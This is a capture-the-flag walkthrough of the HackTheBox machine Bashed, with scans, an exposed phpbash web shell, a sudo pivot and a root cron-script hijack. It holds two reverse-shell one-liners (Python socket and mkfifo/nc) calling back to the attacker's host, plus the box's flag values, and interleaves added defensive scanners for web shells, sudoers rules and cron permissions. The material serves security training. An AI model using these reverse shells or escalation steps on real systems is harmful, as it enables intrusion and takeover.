HackTheBox | Bashed

In this walkthrough, I demonstrate how I obtained complete ownership of Bashed on HackTheBox
In: TJ Null OSCP Practice, OSCP Prep, HackTheBox, Attack, CTF

Nmap Results

# Nmap 7.93 scan initiated Wed Mar 29 00:20:11 2023 as: nmap -Pn -p- -T5 -A -oN scan.txt 10.129.97.27
Nmap scan report for 10.129.97.27
Host is up (0.014s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.8 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 993/tcp)
HOP RTT      ADDRESS
1   12.31 ms 10.10.14.1
2   12.42 ms 10.129.97.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 29 00:20:34 2023 -- 1 IP address (1 host up) scanned in 23.26 seconds





Service Enumeration

TCP/80

Interesting mention of 'phpbash'
gobuster dir -u http://10.129.97.27 -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -x php,html -t 100 -o gobuster.txt

/about.html           (Status: 200) [Size: 8193]
/config.php           (Status: 200) [Size: 0]
/contact.html         (Status: 200) [Size: 7805]
/css                  (Status: 200) [Size: 1759]
/dev                  (Status: 200) [Size: 1149]
/fonts                (Status: 200) [Size: 2096]
/images               (Status: 200) [Size: 1565]
/index.html           (Status: 200) [Size: 7743]
/js                   (Status: 200) [Size: 3166]
/php                  (Status: 200) [Size: 940]
/scroll.html          (Status: 200) [Size: 10863]
/single.html          (Status: 200) [Size: 7477]
/uploads              (Status: 200) [Size: 14]

Looking at the output, the most immediately interesting resources are:

  • /dev/
  • /php/
  • /uploads

And just like that, we found the phpbash.php script:

Great, so we've got command execution on the target! Let's see if I can ping my VPN IP.

Excellent! We can communicate back to my Kali instance, so the prospects of a reverse shell have become that much more promising. Netcat is installed on the target, but does not support the -e parameter.

Python is installed on the target





Exploit

The system administrator left a sensitive directory on the web server globally readable. This directory contains a PHP script that allows an unauthenticated user to execute arbitrary commands on the remote server. This directory should not be globally readable, and ideally the development environment should be isolated in a non-public network.
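As an added, defender-side example (not part of the original walkthrough), the following Python script scans a web root for PHP files that feed request input into a command-execution function, which is exactly what a phpbash-style shell left in a forgotten dev directory looks like on disk. The web root, its file names and their contents are constructed in a temporary directory for the demonstration; the function list is a heuristic starting point, not an exhaustive signature set.

```python
"""Flag PHP files under a web root that pass request input to a
command-execution function, the pattern behind phpbash-style web shells.
Added example, not part of the original walkthrough; the sample web root
below is constructed in a temporary directory."""
import os
import re
import tempfile

# PHP functions that hand a string to the OS shell or the PHP interpreter.
EXEC_FUNCS = ("shell_exec", "exec", "system", "passthru", "proc_open", "popen", "eval")
# Request superglobals that carry attacker-controlled input.
REQUEST_VARS = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")

EXEC_RE = re.compile(r"\b(" + "|".join(EXEC_FUNCS) + r")\s*\(")
REQUEST_RE = re.compile("|".join(re.escape(v) for v in REQUEST_VARS))


def classify_php(source: str) -> dict:
    """Return which exec functions and request variables appear in one PHP source."""
    return {
        "exec_funcs": sorted(set(EXEC_RE.findall(source))),
        "request_vars": sorted(set(REQUEST_RE.findall(source))),
    }


def is_suspicious(source: str) -> bool:
    """A file that both reads request input and calls an exec function is flagged."""
    found = classify_php(source)
    return bool(found["exec_funcs"]) and bool(found["request_vars"])


def scan_webroot(root: str) -> list:
    """Walk the web root and return relative paths of suspicious .php files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                if is_suspicious(fh.read()):
                    hits.append(os.path.relpath(path, root))
    return sorted(hits)


# Constructed sample web root: two harmless files and one web shell in a dev directory.
SAMPLE_FILES = {
    "config.php": "<?php\n$db_host = 'localhost';\n",
    "dev/shell.php": "<?php\nif (isset($_POST['cmd'])) { echo shell_exec($_POST['cmd']); }\n",
    "index.php": "<?php\necho 'hello';\n",
}


def build_sample_webroot() -> str:
    """Write the constructed sample files into a fresh temporary directory."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for hit in scan_webroot(build_sample_webroot()):
        print("suspicious:", hit)
```

Run against a real document root the same scan gives a quick inventory of scripts that deserve review; a match is a prompt to look, not proof of a shell, since legitimate admin tooling can trip the same heuristic.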

Reverse Shell

Attack Box

sudo rlwrap nc -lnvp 80



Target

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<vpn-ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Substitute '<vpn-ip>' and '<port>' with the appropriate values





Post-Exploit Enumeration

Operating Environment

OS & Kernel

NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
    
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL



Users and Groups

Local Users

arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash
scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash

Local Groups

arrexel:x:1000:
adm:x:4:syslog,arrexel
cdrom:x:24:arrexel
sudo:x:27:arrexel
dip:x:30:arrexel
plugdev:x:46:arrexel
arrexel:x:1000:
lpadmin:x:114:arrexel
sambashare:x:115:arrexel

scriptmanager:x:1001:



Network Configurations

Interfaces

ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:4b:66 brd ff:ff:ff:ff:ff:ff
    inet 10.129.97.27/16 brd 10.129.255.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:4b66/64 scope global mngtmpaddr dynamic 
       valid_lft 86394sec preferred_lft 14394sec
    inet6 fe80::250:56ff:feb9:4b66/64 scope link 
       valid_lft forever preferred_lft forever

Open Ports

All open ports previously enumerated.



Interesting Files

/scripts/test.py

Permission denied (see privilege escalation)

/scripts/test.txt

Permission denied (see privilege escalation)





Privilege Escalation

Lateral Pivot

The most obvious privilege escalation path from the initial access is the output of the sudo -l command above, captured when enumerating the current user: it showed that we can run any command as the user scriptmanager without a password. We can use this to spawn a Bash sub-process as scriptmanager.

sudo -u scriptmanager /bin/bash -ip

Spawn a Bash shell as the user 'scriptmanager'
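The grant above is the kind of rule a periodic sudoers review should catch before an attacker does. As an added, defender-side example (not part of the original walkthrough), the following Python script parses /etc/sudoers-style rule lines and flags grants to service accounts and NOPASSWD grants on ALL commands. The rule lines are constructed for the demonstration and are not the box's real sudoers file; the set of service-account names is an assumption you would tailor to your own fleet.

```python
"""Audit sudoers-style rules for grants that let a service account run
arbitrary commands without a password, the misconfiguration that turned a
www-data web shell into a scriptmanager shell. Added example, not part of
the original walkthrough; the rule lines below are constructed."""
import re

# Accounts that web and application servers run under (assumed list); a sudo
# grant for any of these turns a web-shell foothold into another identity.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody", "daemon"}

# user  host = (runas[:group]) [TAG:] commands
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def parse_rule(line: str):
    """Parse one sudoers rule line; returns None for comments, blanks and Defaults."""
    line = line.strip()
    if not line or line.startswith("#") or line.startswith("Defaults"):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    tags = {t.strip(":") for t in m.group("tags").split()}
    return {
        "user": m.group("user"),
        "host": m.group("host"),
        "runas": (m.group("runas") or "root").strip(),
        "nopasswd": "NOPASSWD" in tags,
        "cmds": m.group("cmds").strip(),
    }


def audit_rules(lines) -> list:
    """Return (user, runas, reason) tuples for every rule that needs a second look."""
    findings = []
    for line in lines:
        rule = parse_rule(line)
        if rule is None:
            continue
        reasons = []
        if rule["user"] in SERVICE_ACCOUNTS:
            reasons.append("grant to service account")
        if rule["nopasswd"] and rule["cmds"] == "ALL":
            reasons.append("NOPASSWD on ALL commands")
        if reasons:
            findings.append((rule["user"], rule["runas"], "; ".join(reasons)))
    return findings


# Constructed sample, not the box's real /etc/sudoers.
SAMPLE_SUDOERS = [
    "# constructed sample sudoers",
    "Defaults env_reset",
    "root ALL=(ALL:ALL) ALL",
    "%sudo ALL=(ALL:ALL) ALL",
    "www-data ALL=(scriptmanager : scriptmanager) NOPASSWD: ALL",
    "backup ALL=(root) NOPASSWD: /usr/bin/rsync",
]


if __name__ == "__main__":
    for user, runas, reason in audit_rules(SAMPLE_SUDOERS):
        print(f"{user} -> ({runas}): {reason}")
```

The backup rule is left unflagged on purpose: a NOPASSWD grant scoped to one binary is a different risk from ALL, and the point of the audit is to surface the rules that hand over a whole identity.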



More Enumeration

Earlier, we found the interesting /scripts directory, which is owned by the scriptmanager user.

Read 'test.py'
Read 'test.txt'

There's nothing particularly useful about this script at first glance. It just opens a file in write mode and writes the text "testing 123!" to it. But, you'll notice that the test.txt file it writes to is owned by root.

That leads me to believe that the root user has a cron job that runs this script at regular intervals, which means that by editing the script we control what gets read and written, and as whom.



Test Script Modifications

Let's give it a test:

cd /scripts
cp test.py test.py.orig
sed -i 's/testing\ 123\!/0xBEN was here/' test.py

Overwrite 'testing 123!' with '0xBEN was here'

Then, we'll give it a minute or more to see if the file is overwritten with our new content.

Excellent! We can use this script to get a reverse shell as root.
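The root cause here is a root cron job executing a script that a non-root user owns and can rewrite. As an added, defender-side example (not part of the original walkthrough), the following Python script audits a cron-executed script and its containing directory for the two properties that would have prevented this: ownership by a trusted uid and no group/other write bits. The sample files are constructed in a temporary directory, so the demo uses the current uid as the trusted owner and shows the mode check; the pure `check_stat` helper shows the ownership check with an assumed uid of 1001.

```python
"""Audit a script that a root cron job executes: the script and the
directory holding it must be owned by a trusted uid and must not be
writable by group or others, otherwise whoever can write the file runs
code as root on the next tick. Added example, not part of the original
walkthrough; the sample files are constructed in a temp directory."""
import os
import stat
import tempfile

WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def check_stat(uid: int, mode: int, trusted_uid: int = 0) -> list:
    """Return the problems with one (uid, mode) pair; an empty list means clean."""
    problems = []
    if uid != trusted_uid:
        problems.append(f"owned by uid {uid}, expected {trusted_uid}")
    if mode & WRITABLE_BY_OTHERS:
        problems.append(f"writable by group/others (mode {stat.S_IMODE(mode):04o})")
    return problems


def audit_cron_script(script: str, trusted_uid: int = 0) -> dict:
    """Map the script and its directory to their problem lists.

    The directory matters as much as the file: its owner can replace the
    script even when the file itself is not writable."""
    results = {}
    for path in (script, os.path.dirname(os.path.abspath(script))):
        st = os.stat(path)
        results[path] = check_stat(st.st_uid, st.st_mode, trusted_uid)
    return results


def build_sample() -> tuple:
    """Constructed /scripts look-alike: one well-protected script, one group-writable."""
    root = tempfile.mkdtemp(prefix="scripts-")
    os.chmod(root, 0o755)
    safe = os.path.join(root, "safe.py")
    loose = os.path.join(root, "test.py")
    for path in (safe, loose):
        with open(path, "w", encoding="utf-8") as fh:
            fh.write("print('testing 123!')\n")
    os.chmod(safe, 0o755)
    os.chmod(loose, 0o775)  # group-writable: anyone in the owning group can rewrite it
    return safe, loose


def demo() -> dict:
    """Audit both sample scripts, treating the current uid as the trusted owner."""
    safe, loose = build_sample()
    me = os.getuid()
    return {
        "safe": audit_cron_script(safe, me)[safe],
        "loose": audit_cron_script(loose, me)[loose],
    }


if __name__ == "__main__":
    for name, problems in demo().items():
        print(name, "->", problems or "clean")
```

On a real host you would feed this every path referenced from /etc/crontab, /etc/cron.d and root's crontab with the default trusted uid of 0; the /scripts case would fail on ownership alone, before the mode bits are even considered.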



Reverse Shell as Root

echo -e 'import os\nos.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [vpn-ip] [port] >/tmp/f")' > test.py

Replace [vpn-ip] and [port] with your respective values





Flags

User

30713224fb6d6052e4a3531c810bfdc2

Root

b3f15ad04264315df873221871b3da80